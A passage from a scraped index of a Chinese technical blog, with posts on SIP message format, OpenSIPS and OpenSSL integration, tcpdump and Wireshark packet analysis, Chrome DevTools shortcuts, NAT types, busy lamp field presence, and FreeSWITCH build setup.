无论多么好的自带键盘,都比不过外接的键盘,毕竟是专业的。当然除非你经常出差或者移动,外接键盘真是非常值得入手。 关于下一台电脑:下一台电脑我会等待M2芯片, macbook pro或者是mac mini, 这个我还没想好。我对命令行以及相关unix有着很大的依赖。即使用ubuntu, 我也不可能再使用windows。\n","permalink":"https://wdd.js.org/posts/2020/12/kxpswu/","summary":"我的macbook是2017买的, 使用到今天大概1204天。\n最初的使用体验是\n触摸板很灵敏 屏幕很高清 系统很流畅 三年中出现过的问题\n键盘中的几个按键出现过问题,按键不灵敏。17年是用的蝴蝶键盘,这个键盘问题很多。最新版已经换成了剪刀脚键盘了。 屏幕老化,屏幕的四周出现淡红色的红晕,但是不影响使用。 如果不充电的情况下,掉电蛮快的,而且有时候电量还很多,就自动关机。 现在的感觉:\n触摸板我基本不会用了,因为大部分时间我都是用键盘可以搞定一切。因为我用了vim编辑器。 我也不再使用macbook pro自带的键盘,因为真是不好用。所有的笔记本键盘,除了thinkpad的键盘。都不太好用,不适合长时间打字。所以我用了外接的静电容键盘。 无论多么好的自带键盘,都比不过外接的键盘,毕竟是专业的。当然除非你经常出差或者移动,外接键盘真是非常值得入手。 关于下一台电脑:下一台电脑我会等待M2芯片, macbook pro或者是mac mini, 这个我还没想好。我对命令行以及相关unix有着很大的依赖。即使用ubuntu, 我也不可能再使用windows。","title":"macbook pro 使用三年后的感受"},{"content":" generic-message = start-line *message-header CRLF [ message-body ] start-line = Request-Line / Status-Line 其中在rfc2543中规定\nCR = %d13 ; US-ASCII CR, carriage return character LF = %d10 ; US-ASCII LF, line feed character 项目 十进制 字符串表示 CR 13 \\r LF 10 \\n 也就是说在一个SIP消息中\nheadline\\r\\n key:v\\r\\n \\r\\n some_body\\r\\n 所以CRLF就是 \\r\\n 参考 https://tools.ietf.org/html/rfc3261 https://tools.ietf.org/html/rfc2543 ","permalink":"https://wdd.js.org/opensips/ch3/sip-crlf/","summary":" generic-message = start-line *message-header CRLF [ message-body ] start-line = Request-Line / Status-Line 其中在rfc2543中规定\nCR = %d13 ; US-ASCII CR, carriage return character LF = %d10 ; US-ASCII LF, line feed character 项目 十进制 字符串表示 CR 13 \\r LF 10 \\n 也就是说在一个SIP消息中\nheadline\\r\\n key:v\\r\\n \\r\\n some_body\\r\\n 所以CRLF就是 \\r\\n 参考 https://tools.ietf.org/html/rfc3261 https://tools.ietf.org/html/rfc2543 ","title":"SIP消息格式CRLF"},{"content":"下载安装 Lens-4.0.4.dmg\n添加集群 在k8s master 节点上输入下面的指令,将输出内容复制一下\nkubectl config view --minify --raw 选择File \u0026gt; Add cluster 粘贴 集群就显示出来了 ","permalink":"https://wdd.js.org/posts/2020/12/ai1lnu/","summary":"下载安装 Lens-4.0.4.dmg\n添加集群 在k8s master 节点上输入下面的指令,将输出内容复制一下\nkubectl config view --minify --raw 选择File \u0026gt; Add cluster 粘贴 集群就显示出来了 ","title":"lens k8s IDE"},{"content":" In order to provide secure SIP communication over TLS connections, OpenSIPS uses the OpenSSL library, probably the most widely used open-source TLS \u0026amp; SSL library across the Internet. The fact that it is so popular and largely used makes it more robust, therefore a great choice to enforce security in a system! That was the reason it was chosen to be used in OpenSIPS in the first place. 
However, being designed as a multi-threaded library, while OpenSIPS is a multi-process application, integrating it was not an easy task. Furthermore, maintaining it was not trivial either. And the major changes in the OpenSSL library within the last couple of years have proven that. Once the library maintainers decided to have a more robust thread-safe approach, things started to break in OpenSIPS. Hence the numerous issues reported within the last couple of years related to SSL bugs and crashes. The purpose of this post is to present the challenges we faced, and how we dealt with them. This article describes the way OpenSSL, a library designed for multi-threaded use, was made to work in OpenSIPS, a multi-process application, and what the journey of maintaining the code by adapting to the changes in the OpenSSL library throughout the years looked like.\nOpenSSL是个多线程的程序, OpenSIPS是个多进程的程序,两者配合比较难 OpenSSL的大版本升级,有很大的可能性导致OpenSIPS也出问题 在github上有很多的issue都是关于OpenSSL和OpenSIPS [BUG] Deadlock in libssl/libcrypto #1767 https://github.com/OpenSIPS/opensips/issues/1858 Original design The initial design and implementation of TLS support in OpenSIPS was done in 2003. Back then OpenSSL was releasing revision 0.9.6. That’s the version that we used for the original design and implementation.OpenSIPS is a multi-process server, able to handle SIP requests or replies in multiple processes, in parallel. When a message is received it is “assigned” to any of its free processes, which is responsible for the entire processing of that message. Any of these processes might decide, based on the routing logic, that the request has to be forwarded to the next hop using TLS. This means that any OpenSIPS worker process needs to be able to forward a message using SSL/TLS connections. 
And naturally, since all these processes run simultaneously, multiple processes can decide to forward the messages to the same TLS destination, raising various consistency concerns.In terms of design, there were three possible ways of ensuring consistency in this multi-process environment:\nEach process has its own SSL/TLS connection towards each destination. This means that if you have N workers and M destinations, your OpenSIPS server will have to maintain NxM connections. That’s something we should avoid. Map each SSL/TLS connection with a worker, and only that worker is allowed to communicate with that endpoint. When a different process has to forward a message to a specific endpoint, it will first send the message/job to the designated worker, which forwards it down to the next hop. Although this looks OK, it involves an extra layer of inter-process communication for the job dispatching, and it is also prone to scalability issues (for example when the destination is a TLS trunk). Keep a single SSL/TLS connection to each destination throughout all the processes, and make sure there is mutually exclusive concurrent access to it. This seems to be the most elegant solution, as your SIP interconnections will always see a single TLS connection towards your server. However, ensuring mutual access to the connection is not that trivial, as you will see throughout this article. Nevertheless, since in OpenSIPS we need to address both scalability and ease interconnection with other SIP endpoints, we decided to implement solution number 3.\nInitial Implementation Although even back then it was advertised as a multi-threaded library, OpenSSL was exposing hooks to use it in a multi-process environment:\nCRYPTO_set_mem_functions() hook could be used to have the library use a custom memory allocator. 
We set this function to make sure OpenSSL allocates the SSL context in a shared memory, so that it can be accessed by any process **CRYPTO_set_id_callback() **was used to determine the thread that OpenSSL was running in. We used this callback to indicate that the “thread” was actually a process, and each of them has its own id, namely the Process ID (PID) CRYPTO_set_locking_callback() was exposing hooks to perform create, lock, unlock and delete using “user” specified locking mechanisms. Using this function we were able to “guard” the SSL shared context (allocated in our shared memory) using OpenSIPS specific multi-process shared locking mechanisms. That being said, we had all the ingredients to implement our chosen solution using OpenSSL, all we had to do was to glue them together. This is how the first implementation of SSL/TLS communication appeared in OpenSIPS. And it worked out just great throughout the years, up until (and including) OpenSSL version 1.0.2.\nOpenSSL 1.1.0 new threading API The turning point On 25th of August 2016, when OpenSSL 1.1.0 was released, the OpenSSL team decided to implement a new threading API. In order to provide a nicer usage experience to multi-threaded applications that were using the OpenSSL libraries, they dropped the previously used threading mechanism and replaced it with their own (hardcoded) implementation using pthreads (for Linux). This means that we could no longer use the CRYPTO_set_locking_callback() hooks, as they became obsolete.Since we were still allocating SSL contexts in shared memory, the locking mechanisms (i.e. pthread mutex structures) were also allocated in shared memory. 
Therefore, when OpenSSL was using them to guard the shared context, it was actually still using a “shared” memory, therefore the other processes were able to see that the lock/pthread mutex is acquired, resulting (in theory) in a successful mutual exclusion to the shared context.\nThe issue In practice, however, this resulted in a deadlock (see tickets #1590 #1755 , #1767). Although in general it was working fine, the problem appears when there’s a contention trying to acquire the pthread mutex from two different processes at the same time. Imagine process P1 and P2 trying to acquire mutex M in parallel: P1 gets first and acquires M; P2 then tries to acquire it – because M is in shared memory, it detects that M is already acquired (by P1), thus it blocks waiting for it to be released. When P1 finishes the processing, it releases M. However, due to the fact that pthread mutexes by default are not meant to be shared between processes, P2 is not informed that M was released, thus remaining stuck. This was a problem very hard to debug, because when a process gets stuck, the first thing to do is to run a trap (opensipsctl trap) and check which process is blocked. However, when running trap, gdb is executed on each OpenSIPS process, therefore each process is “interrupted” to do a GDB dump. Therefore our trap command would actually wake P2, make it re-evaluate the status of M, and basically unblock the process and “fix” the “deadlock”.\nThe solution Luckily, after a lot of tests and brainstorming, we managed to pinpoint the issue. The fix was quite simple – all we had to do was to set the PTHREAD_PROCESS_SHARED attribute to the pthread shared mutex. However, these mutexes are encapsulated in the openssl library, and there are no hooks to tune them. After trying to pick some brains from the OpenSSL team, we realized that they are not interested in supporting that, therefore we had to take this issue into our own hands. 
That’s when we used a trick to overload the **pthread_mutex_init() **and **pthread_rwlock_init() **with our own implementation, that was also setting the shared attribute. And our SSL/TLS implementation started to work again.\nOpenSSL 1.1.1 new challenges New crashes With the OpenSSL 1.1.1 release on 11th of September 2018, new issues started to appear. Due to the fact that the OpenSSL team was trying to make their code base even more thread friendly (without considering the effects on multi-process applications), they started to move most of their internal objects into TLS (thread local storage) memory zones. Although OpenSIPS was still allocating OpenSSL contexts in shared memory, these were stored in some locations where only one thread has access. Mixing the two memory management mechanisms resulted in several unexpected crashes in the SSL library (see ticket #1799).\nFixing attempts After reading the OpenSSL library code and understanding the problem, our first idea was to implement a thread local storage that was compatible with multiple processes. This was our first attempt to fix the issue: overwrite the pthread_key_create(), pthread_getspecific() and pthread_setspecific() functions, similarly to the solution we had for OpenSSL 1.1.0 issues, to make them multi-process aware. Unfortunately our solution failed for two reasons: although the library was no longer crashing, hence the memory operations were now valid, most of the concurrent connections were rejected (only 2 out of 10 SSL accepts were passing through). So this indicated to us that there are still some issues with the internal data – although it is now accessible, most likely there is no concurrent access to it, resulting in unexpected behavior. A second issue with this approach was that overwriting the thread local storage implementation was not only done for the OpenSSL library, but for all the other libraries that were used by OpenSIPS. 
And since those libraries most likely do not use OpenSIPS managed memory, this might introduce bugs in other libraries – therefore we had to drop this solution.The second attempt to fix this issue came from inspecting the stack trace of the crashes, combined with vitalikvoip’s suggestion, which indicated that the problem was within the pseudo random-number generator (RAND_DRBG_bytes()). Therefore we proceeded by using the RAND_set_rand_method() hooks to guard the random number generators. Although this stopped the crashes, connections were still not properly accepted (again, 8 out of 10 were rejected), so we were back to square one.\nFinal fix Since the problem was not sorted out, we started to dig more into OpenSSL thread safety considerations and discussions (see OpenSSL ticket #2165), and try to understand how these translate to process safety. This made us wonder if it is OK to have an SSL_CTX (the context that manages what certificates, ciphers and other settings are to be used for new connections) shared among all processes. Therefore our next attempt to fix this issue was to duplicate the context (not the connection context, but the global context of SSL) in each process, and use each process’ context to create new connections. And voilà, OpenSIPS started to accept all the connections, without any issues!After running a set of tests, both by us and our community, we concluded that the issue was the fact that the global SSL context was shared among OpenSIPS processes. Unfortunately this was not a diagnosis that we could have come up with easily, due to the fact that this was working just fine up until version 1.1.1, and there were no indications in the OpenSSL documentation that this behavior had changed. Hence, the long-term process of solving this issue.\nConclusions As described throughout the article, running OpenSSL in a multi-process environment, with a context that is shared among multiple processes, is definitely doable. 
However, without support from the library itself (such as offering locking and memory allocation hooks and providing exhaustive documentation), it becomes more and more complicated to maintain the current implementation. That’s why in the future we are planning to look into different alternatives for TLS (i.e. more multi-process friendly libraries).But until then, you can use OpenSIPS with the latest OpenSSL TLS implementation without any issues!Many thanks to vitalikvoip and danpascu for their valuable input on the latest matters, as well as to the whole OpenSIPS core team for all the brainstorming sessions for these issues (and not only :)). Although they were not easy to solve, it was definitely a lot of fun dealing with them.If you want to find out more information regarding this topic (and not only), make sure you do not miss this year’s OpenSIPS Summit on 5th-8th May 2020, in Amsterdam, Netherlands.\n","permalink":"https://wdd.js.org/opensips/blog/openssl-opensips/","summary":"In order to provide secure SIP communication over TLS connections, OpenSIPS uses the OpenSSL library, probably the most widely used open-source TLS \u0026amp; SSL library across the Internet. The fact that it is so popular and largely used makes it more robust, therefore a great choice to enforce security in a system! That was the reason it was chosen to be used in OpenSIPS in the first place. However, being designed as a multi-threaded library, while OpenSIPS is a multi-process application, integrating it was not an easy task.","title":"The OpenSIPS and OpenSSL journey"},{"content":"perl: warning: Setting locale failed. perl: warning: Please check that your locale settings: LANGUAGE = (unset), LC_ALL = (unset), LC_CTYPE = \u0026#34;UTF-8\u0026#34;, LANG = \u0026#34;en_US.UTF-8\u0026#34; are supported and installed on your system. perl: warning: Falling back to the standard locale (\u0026#34;C\u0026#34;). 
add in .bashrc\nexport LANG=en_US.UTF-8 export LANGUAGE=en_US.UTF-8 export LC_COLLATE=C export LC_CTYPE=en_US.UTF-8 source ~/.bashrc\n","permalink":"https://wdd.js.org/posts/2020/12/setting-locale-failed/","summary":"perl: warning: Setting locale failed. perl: warning: Please check that your locale settings: LANGUAGE = (unset), LC_ALL = (unset), LC_CTYPE = \u0026#34;UTF-8\u0026#34;, LANG = \u0026#34;en_US.UTF-8\u0026#34; are supported and installed on your system. perl: warning: Falling back to the standard locale (\u0026#34;C\u0026#34;). add in .bashrc\nexport LANG=en_US.UTF-8 export LANGUAGE=en_US.UTF-8 export LC_COLLATE=C export LC_CTYPE=en_US.UTF-8 source ~/.bashrc","title":"perl: warning: Setting locale failed."},{"content":"使用触摸板,可以左右滑动,来左右滚动只能部分显示的页面。但是在用鼠标的时候,由于鼠标滚轮只能上下滚动页面,所以不太方便。\n此时,你可以按住shift + 滚动鼠标滚轮,来实现左右滚动页面\n","permalink":"https://wdd.js.org/posts/2020/12/yor2t9/","summary":"使用触摸板,可以左右滑动,来左右滚动只能部分显示的页面。但是在用鼠标的时候,由于鼠标滚轮只能上下滚动页面,所以不太方便。\n此时,你可以按住shift + 滚动鼠标滚轮,来实现左右滚动页面","title":"Get: shift + 鼠标滚轮 左右滚动页面"},{"content":"ethereal-tcpdump.pdf\n","permalink":"https://wdd.js.org/network/hhlfi1/","summary":"ethereal-tcpdump.pdf","title":"tcpdump filters"},{"content":"libpcap-tutorial.pdf\n","permalink":"https://wdd.js.org/network/ivzphz/","summary":"libpcap-tutorial.pdf","title":"libpcap tutorial"},{"content":"tcpdump-zine.pdf\n","permalink":"https://wdd.js.org/network/yscigi/","summary":"tcpdump-zine.pdf","title":"tcpdump zine"},{"content":"准备条件 有gcc编译器 安装libpcap包 1.c 试运行 #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;pcap.h\u0026gt; int main(int argc, char *argv[]) { char *dev = argv[1]; printf(\u0026#34;Device: %s\\n\u0026#34;, dev); return(0); } gcc ./1.c -o 1.exe -lpcap demo-libpcap git:(master) ✗ ./1.exe eth0 Device: eth0 第一个栗子非常简单,仅仅是测试相关的库是否加载正确\n2.c 获取默认网卡名称 参考 http://www.tcpdump.org/pcap.html ","permalink":"https://wdd.js.org/network/uq5cii/","summary":"准备条件 有gcc编译器 安装libpcap包 1.c 试运行 #include \u0026lt;stdio.h\u0026gt; #include 
\u0026lt;pcap.h\u0026gt; int main(int argc, char *argv[]) { char *dev = argv[1]; printf(\u0026#34;Device: %s\\n\u0026#34;, dev); return(0); } gcc ./1.c -o 1.exe -lpcap demo-libpcap git:(master) ✗ ./1.exe eth0 Device: eth0 第一个栗子非常简单,仅仅是测试相关的库是否加载正确\n2.c 获取默认网卡名称 参考 http://www.tcpdump.org/pcap.html ","title":"pcap抓包教程"},{"content":"使用tcpdump在服务端抓包,将抓包后的文件在wireshark中打开。\n然后选择:Telephony - VoIP Calls,wireshark可以从抓包文件中提取出SIP呼叫列表。\n呼叫列表页面 在呼叫列表页面,选择一条呼叫记录,点击Flow Sequence, 可以查看该呼叫的SIP时序图。点击Play Stream, 可以播放该条呼叫的声音。\nRTPplay页面有播放按钮,点击播放可以听到通话声音。\n","permalink":"https://wdd.js.org/network/zgftde/","summary":"使用tcpdump在服务端抓包,将抓包后的文件在wireshark中打开。\n然后选择:Telephony - VoIP Calls,wireshark可以从抓包文件中提取出SIP呼叫列表。\n呼叫列表页面 在呼叫列表页面,选择一条呼叫记录,点击Flow Sequence, 可以查看该呼叫的SIP时序图。点击Play Stream, 可以播放该条呼叫的声音。\nRTPplay页面有播放按钮,点击播放可以听到通话声音。","title":"wireshark从pcap中提取语音文件"},{"content":"tcpdump可以在抓包时,按照指定时间间隔或者按照指定的包大小,产生新的pcap文件。用wireshark分析这些包时,往往需要将这些包做合并或者分离操作。\nmergecap 如果安装了Wireshark那么mergecap就会自动安装,可以使用它来合并多个pcap文件。\n// 按照数据包中的时间顺序合并文件 mergecap -w output.pcap input1.pcap input2.pcap input3.pcap // 按照命令行中的输入数据包文件顺序合并文件 // 不加-a, 可能会导致SIP时序图重复的问题 mergecap -a -w output.pcap input1.pcap input2.pcap input3.pcap editcap 对于一个很大的pcap文件,按照时间范围分割出新的pcap包\neditcap -A \u0026#39;2014-12-10 10:11:01\u0026#39; -B \u0026#39;2014-12-10 10:21:01\u0026#39; input.pcap output.pcap 参考 https://blog.csdn.net/qq_19004627/article/details/82287172 ","permalink":"https://wdd.js.org/network/kgrco2/","summary":"tcpdump可以在抓包时,按照指定时间间隔或者按照指定的包大小,产生新的pcap文件。用wireshark分析这些包时,往往需要将这些包做合并或者分离操作。\nmergecap 如果安装了Wireshark那么mergecap就会自动安装,可以使用它来合并多个pcap文件。\n// 按照数据包中的时间顺序合并文件 mergecap -w output.pcap input1.pcap input2.pcap input3.pcap // 按照命令行中的输入数据包文件顺序合并文件 // 不加-a, 可能会导致SIP时序图重复的问题 mergecap -a -w output.pcap input1.pcap input2.pcap input3.pcap editcap 对于一个很大的pcap文件,按照时间范围分割出新的pcap包\neditcap -A \u0026#39;2014-12-10 10:11:01\u0026#39; -B \u0026#39;2014-12-10 10:21:01\u0026#39; input.pcap output.pcap 参考 
https://blog.csdn.net/qq_19004627/article/details/82287172 ","title":"wireshark合并和按时间截取pcap文件"},{"content":"本页介绍 Chrome DevTools 中所有键盘快捷键的参考信息。一些快捷键全局可用,而其他快捷键会特定于单一面板。您也可以在提示中找到快捷键。将鼠标悬停在 DevTools 的 UI 元素上可以显示元素的提示。 如果元素有快捷键,提示将包含快捷键。\n访问 DevTools 访问 DevTools 在 Windows 上 在 Mac 上 打开 Developer Tools F12、Ctrl + Shift + I Cmd + Opt + I 打开/切换检查元素模式和浏览器窗口 Ctrl + Shift + C Cmd + Shift + C 打开 Developer Tools 并聚焦到控制台 Ctrl + Shift + J Cmd + Opt + J 检查检查器(取消停靠第一个后按) Ctrl + Shift + I Cmd + Opt + I 全局键盘快捷键 下列键盘快捷键可以在所有 DevTools 面板中使用:\n全局快捷键 Windows Mac 显示一般设置对话框 ?、F1 ? 光标定位到地址栏 Ctrl + L Cmd + L 下一个面板 Ctrl + ] Cmd + ] 上一个面板 Ctrl + [ Cmd + [ 在面板历史记录中后退 Ctrl + Alt + [ Cmd + Opt + [ 在面板历史记录中前进 Ctrl + Alt + ] Cmd + Opt + ] 更改停靠位置 Ctrl + Shift + D Cmd + Shift + D 打开 Device Mode Ctrl + Shift + M Cmd + Shift + M 切换控制台/在设置对话框打开时将其关闭 Esc Esc 刷新页面 F5、Ctrl + R Cmd + R 刷新忽略缓存内容的页面 Ctrl + F5、Ctrl + Shift + R Cmd + Shift + R 在当前文件或面板中搜索文本 Ctrl + F Cmd + F 在所有源中搜索文本 Ctrl + Shift + F Cmd + Opt + F 按文件名搜索(除了在 Timeline 上) Ctrl + O、Ctrl + P Cmd + O、Cmd + P 放大(焦点在 DevTools 中时) Ctrl + + Cmd + Shift + + 缩小 Ctrl + - Cmd + Shift + - 恢复默认文本大小 Ctrl + 0 Cmd + 0 按面板分类的键盘快捷键 Elements Elements 面板 Windows Mac 撤消更改 Ctrl + Z Cmd + Z 重做更改 Ctrl + Y Cmd + Y、Cmd + Shift + Z 导航 向上键、向下键 向上键、向下键 展开/折叠节点 向右键、向左键 向右键、向左键 展开节点 点击箭头 点击箭头 展开/折叠节点及其所有子节点 Ctrl + Alt + 点击箭头图标 Opt + 点击箭头图标 编辑属性 Enter、双击属性 Enter、双击属性 隐藏元素 H H 切换为以 HTML 形式编辑 F2 Styles 边栏 Styles 边栏中可用的快捷键:\nStyles 边栏 Windows Mac 编辑规则 点击 点击 插入新属性 点击空格 点击空格 转到源中样式规则属性声明行 Ctrl + 点击属性 Cmd + 点击属性 转到源中属性值声明行 Ctrl + 点击属性值 Cmd + 点击属性值 在颜色定义值之间循环 Shift + 点击颜色选取器框 Shift + 点击颜色选取器框 编辑下一个/上一个属性 Tab、Shift + Tab Tab、Shift + Tab 增大/减小值 向上键、向下键 向上键、向下键 以 10 为增量增大/减小值 Shift + Up、Shift + Down Shift + Up、Shift + Down 以 10 为增量增大/减小值 PgUp、PgDown PgUp、PgDown 以 100 为增量增大/减小值 Shift + PgUp、Shift + PgDown Shift + PgUp、Shift + PgDown 以 0.1 为增量增大/减小值 Alt + 向上键、Alt + 向下键 Opt + 向上键、Opt + 向下键 Sources Sources 面板 Windows Mac 暂停/继续脚本执行 F8、Ctrl + \\ F8、Cmd + \\ 越过下一个函数调用 F10、Ctrl + ' F10、Cmd + ' 
进入下一个函数调用 F11、Ctrl + ; F11、Cmd + ; 跳出当前函数 Shift + F11、Ctrl + Shift + ; Shift + F11、Cmd + Shift + ; 选择下一个调用框架 Ctrl + . Opt + . 选择上一个调用框架 Ctrl + , Opt + , 切换断点条件 点击行号、Ctrl + B 点击行号、Cmd + B 编辑断点条件 右键点击行号 右键点击行号 删除各个单词 Ctrl + Delete Opt + Delete 为某一行或选定文本添加注释 Ctrl + / Cmd + / 将更改保存到本地修改 Ctrl + S Cmd + S 保存所有更改 Ctrl + Alt + S Cmd + Opt + S 转到行 Ctrl + G Ctrl + G 按文件名搜索 Ctrl + O Cmd + O 跳转到行号 Ctrl + P + 数字 Cmd + P + 数字 跳转到列 Ctrl + O + 数字 + 数字 Cmd + O + 数字 + 数字 转到成员 Ctrl + Shift + O Cmd + Shift + O 关闭活动标签 Alt + W Opt + W 运行代码段 Ctrl + Enter Cmd + Enter 在代码编辑器内 代码编辑器 Windows Mac 转到匹配的括号 Ctrl + M 跳转到行号 Ctrl + P + 数字 Cmd + P + 数字 跳转到列 Ctrl + O + 数字 + 数字 Cmd + O + 数字 + 数字 切换注释 Ctrl + / Cmd + / 选择下一个实例 Ctrl + D Cmd + D 撤消上一个选择 Ctrl + U Cmd + U Timeline Timeline 面板 Windows Mac 开始/停止记录 Ctrl + E Cmd + E 保存时间线数据 Ctrl + S Cmd + S 加载时间线数据 Ctrl + O Cmd + O Profiles Profiles 面板 Windows Mac 开始/停止记录 Ctrl + E Cmd + E 控制台 控制台快捷键 Windows Mac 接受建议 向右键 向右键 上一个命令/行 向上键 向上键 下一个命令/行 向下键 向下键 聚焦到控制台 Ctrl + ` Ctrl + ` 清除控制台 Ctrl + L Cmd + K、Opt + L 多行输入 Shift + Enter Ctrl + Return 执行 Enter Return Device Mode Device Mode 快捷键 Windows Mac 双指张合放大和缩小 Shift + 滚动 Shift + 滚动 抓屏时 抓屏快捷键 Windows Mac 双指张合放大和缩小 Alt + 滚动、Ctrl + 点击并用两个手指拖动 Opt + 滚动、Cmd + 点击并用两个手指拖动 检查元素工具 Ctrl + Shift + C Cmd + Shift + C ","permalink":"https://wdd.js.org/posts/2020/11/muk33s/","summary":"本页介绍 Chrome DevTools 中所有键盘快捷键的参考信息。一些快捷键全局可用,而其他快捷键会特定于单一面板。您也可以在提示中找到快捷键。将鼠标悬停在 DevTools 的 UI 元素上可以显示元素的提示。 如果元素有快捷键,提示将包含快捷键。\n访问 DevTools 访问 DevTools 在 Windows 上 在 Mac 上 打开 Developer Tools F12、Ctrl + Shift + I Cmd + Opt + I 打开/切换检查元素模式和浏览器窗口 Ctrl + Shift + C Cmd + Shift + C 打开 Developer Tools 并聚焦到控制台 Ctrl + Shift + J Cmd + Opt + J 检查检查器(取消停靠第一个后按) Ctrl + Shift + I Cmd + Opt + I 全局键盘快捷键 下列键盘快捷键可以在所有 DevTools 面板中使用:","title":"Chrome 键盘快捷键参考"},{"content":"when considered in conjunction with deployment architectures that include 1:M and M:N combinations of Application Servers and Media Servers\nMedia Resource Broker (MRB) entity, which manages the 
availability of Media Servers and the media resource demands of Application Servers. The document includes potential deployment options for an MRB and appropriate interfaces to Application Servers and Media Servers.\n","permalink":"https://wdd.js.org/posts/2020/11/ig536h/","summary":"when considered in conjunction with deployment architectures that include 1:M and M:N combinations of Application Servers and Media Servers\nMedia Resource Broker (MRB) entity, which manages the availability of Media Servers and the media resource demands of Application Servers. The document includes potential deployment options for an MRB and appropriate interfaces to Application Servers and Media Servers.","title":"RFC 6917 笔记"},{"content":"4种NAT类型 NAT类型 接收数据前是否要先发送数据 有没有可能检测下一个IP:PORT对是否打开 是否限制发包目的的IP:PORT 全锥型 no yes no 限制锥型 yes yes only IP 端口限制型 yes yes yes 对称型 yes no yes NAT穿透 • STUN: Simple traversal of UDP over NAT• TURN: Traversal of UDP over Relay NAT• ALG: Application Layer Gateways• MANUAL: Manual configuration (port forwarding)• UPNP: Universal Plug and Play\n","permalink":"https://wdd.js.org/posts/2020/11/nh68ws/","summary":"4种NAT类型 NAT类型 接收数据前是否要先发送数据 有没有可能检测下一个IP:PORT对是否打开 是否限制发包目的的IP:PORT 全锥型 no yes no 限制锥型 yes yes only IP 端口限制型 yes yes yes 对称型 yes no yes NAT穿透 • STUN: Simple traversal of UDP over NAT• TURN: Traversal of UDP over Relay NAT• ALG: Application Layer Gateways• MANUAL: Manual configuration (port forwarding)• UPNP: Universal Plug and Play","title":"NAT"},{"content":"What Is a Busy Lamp Field (BLF) and Why Do You Need It? Busy lamp field is a presence indicator that allows you to see who in your organization is available (or not) for a phone call at any given time.\nThe term “busy lamp field” sounds a bit more involved than it really is. 
Put simply, it just means the ability to see who in your organization is available or not for a phone call at any given time.\nBusy Lamp Field Overview Maybe this analogy will help: You’re in New York City, and you need to flag down a yellow cab. (Let’s pretend Uber isn’t a thing for a minute.) The cabs with their roof light on are available. The cabs with their light off are occupied. If the cab’s roof light is lit up—but not the number, just the words “off duty”—they’re unavailable. Make sense? BLF is much the same, just for office phones: a light indication of who’s available to talk, who’s on the phone, and who’s “off duty” for the moment. If you’re familiar with the term “presence,” BLF is the same thing, just specific to phone extensions. So why do you want these flashing lights in your line of sight? They allow you to monitor your coworkers in real time during the workday. Now, before you go all 1984 on us, let us clarify how this isn’t a Big Brother type of monitoring: BLF is a vital tool for anyone whose job relies on phone calls—think sales, reception, or support. Imagine having to physically check if someone was available for a call. Besides being a wildly inefficient way to spend your day, it also means the caller is left hanging on hold for however long it takes you to find your coworker. And what do you do if the coworker in question is in a different office, in a different state, or even in a different country? An active busy lamp field eliminates this problem altogether. Busy lamp field lets you know who’s available for a call transfer with a single glance.So how does this work in an actual office setting?Take Michael in Sales, for example. He’s on the phone with a customer who has a very specific question that’s best answered by Malcolm. Michael can glance at his OnSIP app screen and immediately see if Malcolm is available, on a call, or logged out at that exact moment. If available, Michael can immediately transfer the customer over to Malcolm. 
If unavailable, Michael can take a message, send the customer to Malcolm’s voicemail, or suggest another agent who is available.\nBusy Lamp Field on Desk Phones: BLF Keys Whether your main desk phone knowledge comes from reruns of The Office or you use one every day, you’ve undoubtedly seen tiny lights blinking on a panel of side buttons. While each phone is unique in its setup, nearly all desk phones have these buttons—BLF keys—to the side of a small screen that you can connect to various extensions. It’s up to you which extensions you configure on your phone—other lines of your own, the coworkers you call the most, people to whom you tend to transfer phone calls, or even your boss. The BLF keys will show different colors, regularly green and red or orange, based on which extensions are currently in use so that you always have an overview of who’s available.If you’d like to set up BLF on your desk phone, our Knowledgebase will help you configure the OnSIP specifics. Each phone has its own guide to colors, flashing status, and configuration, so follow the instructions provided by your particular phone model. BLF keys light up red to indicate a line is in use.\nBusy Lamp Field in the OnSIP Softphone App: BLF Presence The OnSIP app takes a desk phone’s busy lamp field and upgrades it for our current technological norms. Most of us here at OnSIP use our desktop app rather than physical phones. Because we have a contacts panel on the left side of the app, presence is automatically shown for everyone. As an added bonus, the apps also show you how long someone’s been on a call. Here’s how busy lamp field appears in the OnSIP app:\nGreen: Available Orange: Away Cerise: Busy Desk phones have a limited number of BLF keys to configure, so you have to pick and choose which colleagues will be visible to you or constantly switch it around based on daily needs. 
With the OnSIP softphone, everyone is visible in a single glance.To give you an idea of how they differ, here’s a comparison view of BLF as it appears in the app and on a desk phone: How BLF Affects Real-Time Communications WebRTC is a huge part of telecom innovations right now, and OnSIP is no exception. We’ve launched **sayso, **a web-based calling solution that lets your site visitors call or video chat straight from any webpage. It’s a fantastic business tool, but we’ll let you read about that elsewhere—this post is all about busy lamp field, after all.Real-time communication is a wonderful thing, and it wouldn’t be quite as functional without busy lamp field. If sayso couldn’t tell which agents were available to chat, how would it function? Exactly. (We assumed you answered, “It wouldn’t” in your head.) We mentioned above how BLF is simply a phone-specific type of presence—it tells you that a phone is plugged in and can take a call—and certainly the most common form of the feature.Presence factors into how sayso works but with a few key differences. Typical BLF isn’t quite advanced enough for sayso—it requires a more enhanced form of presence. We designed our proprietary presence system to take the typical BLF “available” status to the next level and instead say, “Yes, this person is sitting at their phone at this exact moment and is ready to take your call.” Presence is an essential part of sayso.Busy lamp field is an integral part of the workday for anyone who needs to call a coworker or whose job description heavily features the word “call.” Whether you prefer a desktop interface or a physical handset balanced against your ear, you should be able to glance at your phone of choice and see which coworkers are available at any time. 
The name might be a mouthful, but that’s probably why it’s just a visual cue anyway.\n参考资料 https://www.onsip.com/voip-resources/voip-fundamentals/what-is-a-busy-lamp-field-blf-and-why-do-you-need-it PDF附件 GXV32xx_broadworks_BLF_Guide.pdf 1501643005322.pdf Quick_Setup_BLF_List_on_Yealink_IP_Phones_with_BroadSoft_UC_ONE_v1.0.pdf ","permalink":"https://wdd.js.org/opensips/ch9/blf/","summary":"What Is a Busy Lamp Field (BLF) and Why Do You Need It? Busy lamp field is a presence indicator that allows you to see who in your organization is available (or not) for a phone call at any given time.\nThe term “busy lamp field” sounds a bit more involved than it really is. Put simply, it just means the ability to see who in your organization is available or not for a phone call at any given time.","title":"BLF指示灯"},{"content":"1. 将源码包上传到服务器, 并解压 安装依赖 apt update apt install autoconf \\ libtool \\ libtool-bin \\ libjpeg-dev \\ libsqlite3-dev \\ libspeex-dev libspeexdsp-dev \\ libldns-dev \\ libedit-dev \\ libtiff-dev \\ libavformat-dev libswscale-dev libsndfile-dev \\ liblua5.1-0-dev libcurl4-openssl-dev libpcre3-dev libopus-dev libpq-dev 配置 